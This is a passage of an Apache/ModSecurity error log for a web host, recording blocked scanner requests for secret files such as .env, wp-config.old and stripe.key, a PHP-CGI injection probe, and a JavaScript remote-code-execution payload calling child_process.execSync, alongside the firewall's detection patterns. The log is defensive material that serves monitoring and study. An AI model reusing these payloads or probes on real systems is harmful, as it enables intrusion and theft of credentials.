.cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.sql"] [unique_id "aaPCrW9Vgy73VyAgowdRYgAAAQY"] [Sun Mar 01 06:38:05.861299 2026] [:error] [pid 7726:tid 7790] [client 109.205.180.195:41412] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/yarn-debug.log"] [unique_id "aaPCrSJialSj9ir98JaVgwAAAIk"] [Sun Mar 01 06:38:05.961174 2026] [access_compat:error] [pid 7725:tid 7764] [client 109.205.180.195:41472] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/src [Sun Mar 01 06:38:10.085021 2026] [authz_core:error] [pid 8115:tid 8138] [client 109.205.180.195:60058] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sun Mar 01 06:38:10.135671 2026] [:error] [pid 7726:tid 7799] [client 109.205.180.195:60086] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/web.config"] [unique_id "aaPCsiJialSj9ir98JaVsgAAAJE"] [Sun Mar 01 06:38:10.232720 2026] [:error] [pid 11728:tid 11742] [client 109.205.180.195:60160] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aaPCsm9Vgy73VyAgowdRbQAAAQs"] [Mon Mar 02 07:21:22.450527 2026] [:error] [pid 20707:tid 20715] [client 20.220.232.101:38068] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Mar 04 03:51:18.228893 2026] [authz_host:error] [pid 32699:tid 32703] [client 198.235.24.10:60432] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Wed Mar 04 03:51:18.242948 2026] [authz_core:error] [pid 32699:tid 32703] [client 198.235.24.10:60432] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Wed Mar 04 17:14:02.640025 2026] [:error] [pid 19294:tid 19306] [client 178.128.49.124:61994] [client 178.128.49.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:cwg_ph_flags. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within REQUEST_COOKIES:cwg_ph_flags: {\\x0a \\x22cwg-h1\\x22: \\x22v_3\\x22,\\x0a \\x22cwg-home-testimonials-top-v-bottom-1\\x22: \\x22control\\x22,\\x0a \\x22cta-btn-1\\x22: \\x22v_4\\x22,\\x0a \\x22cta-end-p\\x22: \\x22control\\x22,\\x0a \\x22cwg-home-problem-order\\x22: \\x22no-skills\\x22,\\x0a \\x22cwg-home-videos\\x22: \\x22control\\x22,\\x0a \\x22cta-end-h2\\x22: \\x22v_2\\x22,\\x0a \\x22cta-end-h2-v2\\x22: \\x22v_5\\x22,\\x0a \\x22cwg-hero-cta-btn-2\\x22: \\x22v_4\\x22,\\x0a \\x22cwg-h1-v2\\x22: \\x2..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accur [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aahMOmbPYJqr0YkBIXaCbgAAAQI"], referer: cmr.ihg.mybluehost.me/blog//wp-login.php [Wed Mar 04 17:53:24.312349 2026] [authz_host:error] [pid 366:tid 382] [client 205.210.31.198:62300] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Wed Mar 04 17:53:24.312374 2026] [authz_core:error] [pid 366:tid 382] [client 205.210.31.198:62300] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Wed Mar 04 20:26:02.638316 2026] [authz_host:error] [pid 366:tid 383] [client 198.235.24.253:63496] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Wed Mar 04 20:26:02.638336 2026] [authz_core:error] [pid 366:tid 383] [client 198.235.24.253:63496] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Wed Mar 04 22:33:52.032242 2026] [:error] [pid 32700:tid 32767] [client 3.122.241.235:33120] [client 3.122.241.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aaiXMDaJQkz94nR98OaF2gAAAFU"] [Wed Mar 04 22:33:52.045732 2026] [:error] [pid 32700:tid 32763] [client 3.122.241.235:33120] [client 3.122.241.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aaiXMDaJQkz94nR98OaF2wAAAFM"] [Wed Mar 04 22:33:52.066069 2026] [:error] [pid 32700:tid 304] [client 3.122.241.235:33120] [client 3.122.241.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aaiXMDaJQkz94nR98OaF3AAAAFc"] [Wed Mar 04 23:12:26.861347 2026] [:error] [pid 366:tid 372] [client 44.255.51.166:57818] [client 44.255.51.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aaigOiB_HMpi1kve4LMVoAAAAMI"] [Wed Mar 04 23:12:27.019258 2026] [:error] [pid 366:tid 382] [client 44.255.51.166:57818] [client 44.255.51.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aaigOyB_HMpi1kve4LMVogAAAMw"] [Wed Mar 04 23:12:27.184602 2026] [:error] [pid 366:tid 384] [client 44.255.51.166:57818] [client 44.255.51.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aaigOyB_HMpi1kve4LMVowAAAM4"] [Thu Mar 05 00:55:57.746869 2026] [authz_core:error] [pid 366:tid 390] [client 209.97.180.8:33438] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Thu Mar 05 00:55:58.664440 2026] [authz_core:error] [pid 32700:tid 32745] [client 206.189.95.232:45640] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Thu Mar 05 00:56:12.198416 2026] [:error] [pid 19294:tid 19314] [client 209.97.180.8:55528] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aai4jGbPYJqr0YkBIXZ-mAAAAQk"] [Thu Mar 05 00:56:14.953489 2026] [:error] [pid 32701:tid 32751] [client 206.189.95.232:56352] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aai4jnV4HwIJ5qplG4arjQAAAIY"] [Thu Mar 05 01:09:26.022577 2026] [:error] [pid 19294:tid 19311] [client 185.177.72.60:53086] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aai7pmbPYJqr0YkBIXaIAQAAAQY"] [Thu Mar 05 01:09:27.015972 2026] [access_compat:error] [pid 366:tid 380] [client 185.177.72.60:53118] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Mar 05 01:09:32.930438 2026] [:error] [pid 19294:tid 19314] [client 185.177.72.60:53148] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aai7rGbPYJqr0YkBIXaIqgAAAQk"] [Thu Mar 05 01:09:33.047446 2026] [:error] [pid 19294:tid 19329] [client 185.177.72.60:53148] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aai7rWbPYJqr0YkBIXaIqwAAARg"] [Thu Mar 05 01:09:35.610168 2026] [:error] [pid 32700:tid 32733] [client 185.177.72.60:53030] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.key"] [unique_id "aai7rzaJQkz94nR98OacWgAAAEM"] [Thu Mar 05 01:09:37.757889 2026] [:error] [pid 19294:tid 19318] [client 185.177.72.60:53274] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.log"] [unique_id "aai7sWbPYJqr0YkBIXaI6gAAAQ0"] [Thu Mar 05 01:09:38.546384 2026] [:error] [pid 19294:tid 19313] [client 185.177.72.60:53180] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.conf"] [unique_id "aai7smbPYJqr0YkBIXaI8AAAAQg"] [Thu Mar 05 01:09:38.615932 2026] [:error] [pid 19294:tid 19310] [client 185.177.72.60:53274] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aai7smbPYJqr0YkBIXaI8gAAAQU"] [Thu Mar 05 01:09:38.633864 2026] [:error] [pid 19294:tid 19323] [client 185.177.72.60:53180] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ 